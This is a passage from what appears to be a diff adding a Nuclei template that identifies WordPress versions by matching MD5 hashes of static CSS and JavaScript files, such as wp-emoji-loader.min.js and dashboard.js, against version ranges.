== md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"b0716f9ea0eb89a8037d01d61819d295\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"50da1f79474549fd0de7c53e98d20a80\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"97785d9b8c2eeb9a40dd241db6519b92\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/login-rtl.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - 
"(\"beb63bfdeb079748fc7e56ee7a01a824\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"2730e933c7a1a342a216a88b59090922\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"638da3bea5a7c1f2b42c3f277cea9846\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"0e5a2cd27f0c4117a5fdf616427a7b76\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"a083c62aeb2d3093855dcc92edb5a44c\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"1456ea18b6e704b2de23e24e9f01b905\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"c25af084f22564159483a93fa3b1bd76\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - "(\"d2dbe8659e647d0a7081d7d73f18cbf7\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"563cb2edac2f1e28bc7ba07afcdda851\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"bd502c39f6ac66dd8fc14fc6c47d47c6\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"687e07c713318834113a53841a9b8b4f\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"f0a8b87f786d638f35e74140aa3cff40\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"5f54285e40c9b21d507d2260a2420f47\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.4 + dsl: + - "(\"478fe30c12de9ce895d96b3d0d3bbef9\" == md5(body))" + - type: dsl + name: 4.9.5 + dsl: + - "(\"57dafb76bdabe1eab5512ab4832c8f40\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"861b3448d69e1432e1e87fa5e6b54fc9\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"fefacd93bdb86714698d998fc0f2a865\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"d6d87061e4402b1fd0c4e821877a40e7\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"60938e53731e909ec1a70c20dd2a96ba\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.2 + dsl: + - "(\"582bbded66ab92465aa8decc20a51cba\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - 
"(\"da76e3b93f894e5142d14d00d355e6ab\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"395af750c19e5a0bb9f7e5ed5a0f027d\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"3f10279b62e53594c3aac3fb3d73c3c8\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"3c3de85d77d3959f79cb7d4cc6899268\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-emoji-loader.min.js" + matchers: + - type: dsl + name: 4.8.2 - 4.8.15 + dsl: + - "(\"c324a0faeae39356972d91b004b706d4\" == md5(body))" + - type: dsl + name: 4.8 - 4.8.1 + dsl: + - "(\"95ba8d3404ccae2dcb692b5153972260\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"f3ec21904cc0cf5d899f29e35b0b4612\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"cf0f5dd3b133be89352f938de9d5298f\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.5.23 + dsl: + - "(\"e20f82f707fdc28257628f9bc67c0430\" == md5(body))" + - type: dsl + name: 4.5 + dsl: + - "(\"4499553cf177cb964b0df8c445ebc798\" == md5(body))" + - type: dsl + name: 4.4.3 - 4.4.24 + dsl: + - "(\"d528caab721209ac3e971fd97384379d\" == md5(body))" + - type: dsl + name: 4.4.2 + dsl: + - "(\"2a684c8e10b5294903e28dcd9cac377b\" == md5(body))" + - type: dsl + name: 4.4.1 + dsl: + - "(\"8569719eaedca791a2136e7bad07de29\" == md5(body))" + - type: dsl + name: 4.4 + dsl: + - "(\"05fa167592d86e9c03dc30b4f868c00d\" == md5(body))" + - type: dsl + name: 4.2.2 - 4.3.25 + dsl: + - "(\"26ce699f92d7bd2d7dee5ff0827b296c\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.1 + dsl: + - "(\"5df203c872d3bfe2045aa8dc4370b9fd\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"dffc41c697f23eba1915fc204dee2aa9\" == md5(body))" + - type: dsl + name: 4.9.3 - 4.9.7 + dsl: + - "(\"a0ee12a57e464358e104e53446261174\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.1.8 + dsl: + - "(\"0ac3cd92fe3f0052da47e55c729df482\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"3f3c006ec5abc419c38a50107e3854cd\" 
== md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"7000dea726f734ed07227e6f1abebb13\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"e83c87ec3e7c36b6f412d653e4207855\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"0f34fce4c0d019378b3976a898efb1e9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/widgets-rtl.css" + matchers: + - type: dsl + name: 4.8.1 - 4.8.15 + dsl: + - "(\"9858424b442617bafdea74c56346b848\" == md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"11eb0df301b82d5775206d07575f08f9\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.19 + dsl: + - "(\"52222282329f1e2ba87d9df556b9da51\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"ec5b007681f7fd7595c7209efbddf6d9\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"00f91c295803e867d7fb9e0da9f352a5\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.3.25 + dsl: + - "(\"49b9300d93ddad2c4c8c5136062c5200\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"d81963de7dff71f3295c5a42fba00ab7\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"497445fdaced3a3f74ad9a252e2b95b6\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"bc797ee5fe57916b0191489d31592f2a\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"c94cb7b706d93a2575ce4bb127ce4967\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"b518ff869f6ee3a90b8a87bdee462390\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"3ffd8e2288fc6b29d2e2bec4f1770f4f\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"c72b211f292a7ac48348b3aa47e8f9c1\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"f0799da338bb863983d5f9e0ca53f7ef\" == md5(body))" + - type: dsl + name: 2.6.1 - 2.6.5 + dsl: + - "(\"70b40c8490427ad3fc0d881e0c9995a9\" == md5(body))" + - type: dsl + name: 2.6 + dsl: + - "(\"a1a32a9b498dfa02859b1d03600b6668\" == md5(body))" + - type: dsl + name: 
2.5.1 + dsl: + - "(\"5fd9135577a36d561dea45d8845fd9dd\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"cd137a3d74d868ba4bd25fe64b33892d\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"f464200516b71362dfd560b393ada0a0\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"3657c79999ecaf34843cb01503d6e727\" == md5(body))" + - type: dsl + name: 4.9.3 - 4.9.16 + dsl: + - "(\"7d4210bb7278ef9bae8b79a3c726a2bc\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"461cdf628f771b69a60dd1ba4ba4c3dd\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"f08940c0db2d4007baf254e8be1f1b51\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"a8a5b2c135c5a742e935eeb74f548ed1\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"f25c3ac1e8dc5a2134ba7fec573451be\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"01c2b3122f71d10f82d763808fd477f2\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"70f3f7e0b829eef6cf200786ae55ce6f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/install.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"b5aac84283aa7183c30a25527edd3152\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"8a6f5d94ad68066f64975eb24914dea7\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"41c0a53f9562353c00b517bf9f76bbad\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"985f4c5f6567fa568c0dd17084f34e31\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"96f0b4f48fed4e062afe2b7fc7d0d890\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"42c906bd2400b2ab11aa44a8f8396a9e\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"acea8fff302212325749ca45805add61\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"f4c61ba2aa0c5cd92473ec2b965df108\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - 
"(\"ffc68bc4eeaa6006b6bcb476cc751c43\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"ef980e36248c52fdf84395bb16fed6c1\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"b5a5602923179daa9c75b75e47fd1174\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"8142a20be96cb3dc322e2cd45ec76c0b\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"243359672a1fa89898c942b8d3ae40b2\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"cc99856d0a90f9996ab7683e9d7a1631\" == md5(body))" + - type: dsl + name: 3.2.1 + dsl: + - "(\"e4b5f221205f4075192a67ba25b1dd47\" == md5(body))" + - type: dsl + name: 3.2 + dsl: + - "(\"eb5a90b48f19ecb9a88c0a9254b7af32\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"c4bc56d94f759616b98ec1b3addac4f5\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"cbc0530c7320ad1a70162fef6a74a9aa\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"8409978ebacfbbdd67f280777e42e253\" == md5(body))" + - type: dsl + name: 2.7 - 2.8.6 + dsl: + - "(\"0380e33272aa60d16b2e7d405e7288a8\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"a72d6e3d327047add3066c9e96ce5d1f\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"ad6dfaa24e36fa416d119ee6bf38cf69\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"234fed47c9eef92ca35985d459a99dbf\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"32d34c1ae9e1b6303fb0b846991d308b\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"1a4a323cf79d38c6061b15766f1a4c01\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.2 + dsl: + - "(\"71fc826c2ef26e9dfd4c0ff7ce0d7e89\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"b1703f90b91e7eb19048ce11e28d5b68\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"4fbbf669661beb6bb4cf847428843b43\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.2 + dsl: + - "(\"b3f922c2f2b9b81de2e5ea5713de5a68\" == 
md5(body))" + - type: dsl + name: 5.3.3 - 5.4.4 + dsl: + - "(\"013f2df17e4c93e1b8ad6b3fe66d2a91\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"1e0c637714808ce5696fdf07ac84405e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/plugin.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"fede2d004deec3d7c15459a56bd40a21\" == md5(body))" + - type: dsl + name: 4.7.3 - 4.7.19 + dsl: + - "(\"4a2d07ee67ffb1c5b76b2ac486216057\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.2 + dsl: + - "(\"eaa208851b66085620779cbf3d30fefb\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"3b46a42ebcdf945ff176ce64d7f56668\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"062b51bf3dd5b46eac81fec6b9929559\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"75b114a2b3864eea8534a8b2ff5b66c9\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"aa3dc74f38e3be71febb90a89d2166a8\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"94bb3edac4f1fa30c3f25a79251b53d4\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"9f95f44ac2be559e61e0c16795bbc10e\" == md5(body))" + - type: dsl + name: 4.1.1 - 4.1.32 + dsl: + - "(\"5b122550eec0c22e85083aab44c80b18\" == md5(body))" + - type: dsl + name: 4.1 + dsl: + - "(\"97ed56381413cfaf6d52dd5cb79b3e94\" == md5(body))" + - type: dsl + name: 4.0.1 - 4.0.32 + dsl: + - "(\"f8fc964418d9705e139c934fa0af865e\" == md5(body))" + - type: dsl + name: 4.0 + dsl: + - "(\"fd13d574bf148d9410d3a3d5554e8d1c\" == md5(body))" + - type: dsl + name: 3.9.3 - 3.9.33 + dsl: + - "(\"b516391ad678c1905d10cddd1e8f6f79\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.2 + dsl: + - "(\"0183b86a9564cd298914ccf108e77342\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"9404e45d965fd7625704430c3cee6e51\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.7 + dsl: + - "(\"c048cf6c4dbaaf122fbcad50bbb91eda\" == md5(body))" + - 
type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"55079e203fbb8913c2f34bd839f9a6dd\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"98484c4d2af4382680965d96053a78d4\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"7c46e095db079326a9bf66aa5a05f8a4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/quicktags.js" + matchers: + - type: dsl + name: 1.5.1.1 - 1.5.2 + dsl: + - "(\"113197978798c0416584b2f8520b07a7\" == md5(body))" + - type: dsl + name: 1.5.1 + dsl: + - "(\"3081c635f5f5aa2394d8329cbf0a9346\" == md5(body))" + - type: dsl + name: 1.5-strayhorn + dsl: + - "(\"e9cfc5831a5db27731be236ede39c9b5\" == md5(body))" + - type: dsl + name: 1.2-mingus - 1.2.2 + dsl: + - "(\"0a12c9570a5df5e6878dbdb0fa8c9f71\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"b60c22b11fb52febf809b1aea7fc463b\" == md5(body))" + - type: dsl + name: 1.2-delta + dsl: + - "(\"dd3f50ec1b6f1c60d0c8cf487584ac80\" == md5(body))" + - type: dsl + name: 1.0-platinum - 1.0.2 + dsl: + - "(\"cacc30e78056fcd0b2a55c3d4add02f3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/global.css" + matchers: + - type: dsl + name: 3.2.1 + dsl: + - "(\"6cd0d6c4c32fc3f379668f3754180ff5\" == md5(body))" + - type: dsl + name: 3.2 + dsl: + - "(\"d056ab8b13e3c4221ed4db6fae71dd9b\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"57e3e4cbc2a8f5c8879e04e2fb10c165\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"f70eb26c5ca7f7c0627de3a5b88d999b\" == md5(body))" + - type: dsl + name: 2.9.1 - 2.9.2 + dsl: + - "(\"c65e7d9d4efb1cb319378608ac0af681\" == md5(body))" + - type: dsl + name: 2.9 + dsl: + - "(\"bc834ff6c4039a8ffa7d623e63406d0c\" == md5(body))" + - type: dsl + name: 2.8.1 - 2.8.6 + dsl: + - "(\"5ec06085a2ae7d41dcfcc9f48701caaf\" == md5(body))" + - type: dsl + name: 2.8 + dsl: + - "(\"ccafab6b8bc45a0add424be63085ccbc\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"81edc89f673eda2069e9e5f66c54f4af\" 
== md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"6e0f4cca3aca085d28cbc6cb13777a18\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"8d490e27b9916d9d2520e72075333109\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/wp-admin.min.css" + matchers: + - type: dsl + name: 4.5 - 4.8.15 + dsl: + - "(\"a2e2f67626ed6f9beca5306c1a16abba\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"1ac33574bd35da1e4cf9e66d2d173686\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"0b9fe6899f34daa1a46f71466cc73f8b\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"19084332c355439f6d42ebc0f0e78ebd\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - "(\"6e7ba89ab7be7faca4bd6e96498af536\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"225d1ef58b5ab0f793d3952967df269a\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"2984023919bf18888432e7459d70bf00\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"fceeca9707faf124a462d8e11a9bfb50\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"dec7253451471693a4bbc6f7caea5879\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"3dd46c8d228ad29a841338280647936d\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"50626cb79cfc0acdba560abc2e50006c\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"b129c7f3e3924ed5333b63876f42ff4b\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"ddc1a40f07fa0698af312e2793e4cb41\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"1afa2caa89a284f06309af1aef0820c0\" == md5(body))" + - type: dsl + name: 3.5.1 - 3.5.2 + dsl: + - "(\"f47d48daa5f6d3bf2b6c2f88f9775311\" == md5(body))" + - type: dsl + name: 3.5 + dsl: + - "(\"7b21a55b15494b9d4d9e80f7904e11e0\" == md5(body))" + - type: dsl + name: 4.9 - 5.1.8 + dsl: + - "(\"2bcbab07977867b916887573559917fe\" == md5(body))" + - type: dsl + name: 5.2 - 5.6 
+ dsl: + - "(\"8065e85570ca93fb489a57745021a048\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/plugin.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"d5c9675e20338decbb5cbb5704cbeae3\" == md5(body))" + - type: dsl + name: 4.7.3 - 4.7.19 + dsl: + - "(\"458ea8a81563ce8eaa88303f659fe146\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.2 + dsl: + - "(\"4738b8261ae8b11da71d10be56c25807\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"cdbd8bfddef26eea88e98fbef6b19611\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"fac6e061f27691964e34ba5f02dfff2a\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"8136bbc002d33f1d8231bda314363d57\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"1368498ecb829d4e2c9d74efd0dc522e\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"7fa4ce4504456ad54bc13673d3266608\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"f2633c807b88f1a99e21d313a4986f0f\" == md5(body))" + - type: dsl + name: 4.1.1 - 4.1.32 + dsl: + - "(\"bf8fa9a1830d020a8191eb02c7f74b54\" == md5(body))" + - type: dsl + name: 4.1 + dsl: + - "(\"9ce0cd57c664c6b6c72c85b64ea72ea1\" == md5(body))" + - type: dsl + name: 4.0.1 - 4.0.32 + dsl: + - "(\"f1c91e971f2317ad15a0a50154cf1356\" == md5(body))" + - type: dsl + name: 4.0 + dsl: + - "(\"e79814b0b564f9a8b5e06b98ce80b5e9\" == md5(body))" + - type: dsl + name: 3.9.3 - 3.9.33 + dsl: + - "(\"d4d06728cf002756d5f307b0666c7b11\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.2 + dsl: + - "(\"8f22e62d72c7f4553d29514d41fb824d\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"ed47e3d063b256c3edef89d85d0b516b\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.7 + dsl: + - "(\"510900bd2c55baa38079d9fac576c515\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"275361937714babb1b4ed539582be877\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - 
"(\"39d6da8be0e91e0150c0684f8b9b7274\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"d66af83ce6975dd8408299bfc00934f9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/blocks.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"39f14d3f235f1b438feb1983f1246c4d\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"07722730c567be75e4438cdeeb9afebf\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"f39f38665ac6b784630b3f652375580b\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"7a4696d08badf70c1e40f882ffe45813\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"19801973086df807bf07272d475370df\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"c886c5a99073a097c77ac0b89dd6ec66\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"f022f4f2a3248b7ce50e01ccd46f660b\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"5f1739cdb7dda32447c2c81d677e578f\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.1 + dsl: + - "(\"0c070288e2b9c65d47a73b68dbc70053\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"b57ba5af1f0dcb22a28a10a15a1c187a\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"b944c021151abe56dcf15aae4252d4b8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/blocks.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"55b0f687a9ea42d06bba894f8d3d58a9\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"a3d6108766198fa534db62d0c9cd02dc\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"e66a65abca2667e9478f1298b964be52\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"bbabeb0779cefc55436edfc4ca85a864\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"627c0dca5a0143b6bd29769757aea9e8\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"f8e70eee74b9fada4d55fe508400eff3\" == md5(body))" + - type: dsl + 
name: 5.3 - 5.3.6 + dsl: + - "(\"8d249279b45fc87136d2af98321c9db8\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"60dc7602dbe6addad4f278cea89c736a\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.1 + dsl: + - "(\"a5cfda46f199bc177ec3f6198ca9a160\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"86e6dad06c0a7f869867b207ee1d4838\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"02ce8805820f96d384787c925abe8185\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/dom.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"65e376108b5d8442e0739aa242e75498\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"13ac23f572d351e0523c16bd91350a37\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"0da7a6c0a8988d47b4cbc451ed68e712\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"342d2e765fb6ff70b894d5fcfc7861ce\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"6bc385e8405cb07727a4ebd091b4916b\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"dbb3dfa3c1256ef2d6222ccb3cd482e2\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.4 + dsl: + - "(\"82bd38f305c829b91eaed795af25189f\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"3e341c7a7997aa67b5c81211a6b213b5\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"5fafcc5a10047a3a96f4ec4758767a4b\" == md5(body))" + - type: dsl + name: 5.3.5 - 5.3.6 + dsl: + - "(\"ad44af54b9265c03f60225a806b38a79\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"bdf1d97209882d42e48a2731e681501f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/dom.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"91d9eb0578838f14194588b1468319a7\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"f8fee8733a4739ee773369d652227b08\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"a2f3f8a8d0643c3fef95f4c59b78472a\" == 
md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"1d8a89e41858235c36fdf20e6033ada6\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"d6c4e015c1889eadbcdf2745b92ba58e\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"5f77096af37563d6de3107873f744022\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.4 + dsl: + - "(\"05964cc1e69f018147aeda2b60d4c2ec\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"4d1c93f2308b999efb9a6a3a3f6bac2b\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"f4e037f28dd5e88eecd449ee99700948\" == md5(body))" + - type: dsl + name: 5.3.5 - 5.3.6 + dsl: + - "(\"f949b90ca61d747d51f7620b9a5d5ba1\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"b958b610e6358da9cfffc37e1c158094\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/dashboard.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"7ccec58847924e84dfefdd0d25cea2af\" == md5(body))" + - type: dsl + name: 4.4 - 4.7.19 + dsl: + - "(\"e6aee15ae7cbc39c41e0caa2e93ef635\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.3.25 + dsl: + - "(\"2d4f9155e6121a9caa6eb3d6f8c31e5d\" == md5(body))" + - type: dsl + name: 4.0 - 